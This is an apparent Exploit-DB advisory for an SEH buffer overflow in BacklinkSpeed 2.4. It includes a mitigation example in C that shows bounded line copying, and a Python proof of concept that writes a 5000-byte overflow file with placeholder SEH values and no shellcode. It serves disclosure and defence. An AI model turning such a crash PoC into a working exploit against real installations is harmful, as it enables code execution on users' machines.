Vendor: BacklinkSpeed
By: Saeed reza Zamanian
CVSS: 7.8 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: BacklinkSpeed
Affected Version From: 2.4
Affected Version To: 2.4
Patch Exists: NO
Related CWE: N/A
CPE: a:dummysoftware:backlinkspeed:2.4
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10.0 x64 Build 10240, Windows 7 x64, Windows Vista x32 SP1
Year: 2020

BacklinkSpeed 2.4 – Buffer Overflow PoC (SEH)

BacklinkSpeed 2.4 is vulnerable to a buffer overflow when a maliciously crafted file is imported, which can lead to arbitrary code execution. The exploit creates a text file named payload.txt containing a 5000-byte payload followed by nSEH and SEH values. When payload.txt is imported, the application crashes due to the buffer overflow.

Mitigation:

Ensure that user input is properly validated and sanitized before being used in the application.
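
The length check this mitigation calls for, as an added example: a hypothetical import routine that rejects any line too long for its fixed-size buffer. It is not BacklinkSpeed's code, which this page does not show; `ENTRY_MAX`, `copy_entry` and `import_entries` are assumed names.

```c
/* Added example: hypothetical import routine, not BacklinkSpeed's code. */
#include <stddef.h>
#include <string.h>

#define ENTRY_MAX 2048  /* assumed size of the fixed per-entry buffer */

struct import_result { long accepted; long rejected; size_t longest; };

/* Unsafe pattern behind this bug class, for contrast only:
 *     char entry[ENTRY_MAX];
 *     strcpy(entry, line);      (nothing checks that line fits)
 */

/* Bounded copy: succeeds only if len bytes plus the NUL fit in dst. */
static int copy_entry(char *dst, size_t dst_size, const char *src, size_t len)
{
    if (len >= dst_size)
        return -1;
    memcpy(dst, src, len);
    dst[len] = '\0';
    return 0;
}

/* Split imported data into lines. A line that does not fit the buffer is
 * rejected whole, never truncated or copied past the end of entry[]. */
struct import_result import_entries(const char *data, size_t size)
{
    struct import_result r = {0, 0, 0};
    char entry[ENTRY_MAX];
    size_t start = 0;
    while (start < size) {
        const char *nl = memchr(data + start, '\n', size - start);
        size_t end = nl ? (size_t)(nl - data) : size;
        size_t len = end - start;
        if (len > 0 && data[end - 1] == '\r')  /* tolerate CRLF files */
            len--;
        if (len == 0) {
            /* blank line: nothing to import */
        } else if (copy_entry(entry, sizeof entry, data + start, len) != 0) {
            r.rejected++;
        } else {
            r.accepted++;  /* entry now holds a NUL-terminated, in-bounds line */
            if (len > r.longest)
                r.longest = len;
        }
        start = end + 1;
    }
    return r;
}
```

Counting rejected lines separately gives the application something to log or show the user when an import file contains entries far longer than any legitimate one.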
Source

Exploit-DB raw data:

# Exploit Title: BacklinkSpeed 2.4 - Buffer Overflow PoC (SEH)
# Date: 2020-08-01
# Exploit Author: Saeed reza Zamanian
# Vendor Homepage: http://www.dummysoftware.com
# Software Link: http://www.dummysoftware.com/backlinkspeed.html
# Version: 2.4
# Tested on:
#   Windows 10.0 x64 Build 10240
#   Windows 7 x64
#   Windows Vista x32 SP1
# Replicate Crash:
#   1) Install and run the application
#   2) Run the exploit; it creates a text file named payload.txt
#   3) Press the import button and open payload.txt

#!/usr/bin/python
'''

	|----------------------------------|
	| SEH chain of thread 00000350	   |
	| Address    SE handler		   |
	| 42424242   *** CORRUPT ENTRY *** |
	|				   |
	| EIP : 43434343		   |
	|----------------------------------|
'''

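# Placeholder values that mark where the SEH record is overwritten.
nSEH = b"BBBB"
SEH = b"CCCC"
# Layout: 5000 filler bytes, nSEH, eight 0x90 bytes, SEH.
payload = b"A" * 5000 + nSEH + b"\x90" * 8 + SEH

try:
    # Binary mode so the 0x90 bytes are written unchanged on Python 2 and 3.
    with open("payload.txt", "wb") as f:
        print("[+] Creating %s bytes payload." % len(payload))
        f.write(payload)
    print("[+] File created!")
except IOError:
    print("File cannot be created.")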